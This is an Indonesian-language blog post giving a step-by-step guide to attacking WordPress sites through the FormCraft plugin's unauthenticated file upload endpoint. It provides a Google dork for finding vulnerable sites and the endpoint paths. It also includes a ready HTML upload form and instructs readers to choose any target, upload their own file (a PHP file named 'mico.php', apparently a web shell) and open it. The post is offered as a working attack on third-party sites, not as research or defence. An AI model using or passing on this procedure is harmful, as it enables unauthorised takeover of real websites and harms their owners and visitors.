Bahan :
Dork : inurl:"wp-content/plugins/formcraft/"
Exploit :
[+]wp-content/plugins/formcraft/file-upload/server/php/upload.php
Atau
[+]wp-content/plugins/formcraft/file-upload/server/php/
Script CSRF :
<form method="POST" action="http://localhost/wp-content/plugins/formcraft/file-upload/server/php/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form> {Simpan dengan (*.html)}
Note :
Tulisan yang berwarna orange ganti degan web target kalian!
Langkah-lagkah :
1. Cari web dengan dork diatas
2. Lalu pilih salah satu web
3. Masukkan exploit (contoh : www.example.com/wp-content/plugins/formcraft/file- upload/server/php/upload.php)
4. Jika Vuln akan tampil seperti ini
5. Tinggal File diedit di script CSRF
6. Buka Script FormCraft tadi, lalu upload file kalian
7. Jika sudah akan terlihat seperti gambar ini
![[Image: Screenshot_1.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tCwt-XRaiyetZmv9b--hRI0ELHcPTqKB1Yzo81rBB_zE0cGghNcZXTfY6TXXpfSXXiGMja-nsPioRyMahYIeLPr-14dLUScjrZ__dIs-RFxtkrwg=s0-d)
8. Buka web (contoh : www.example.com/mico.php) atau (contoh : www.example.com/wp-content/plugins/formcraft/file-upload/server/php/mico.php)....Selesai
Sekian...
0 komentar:
Posting Komentar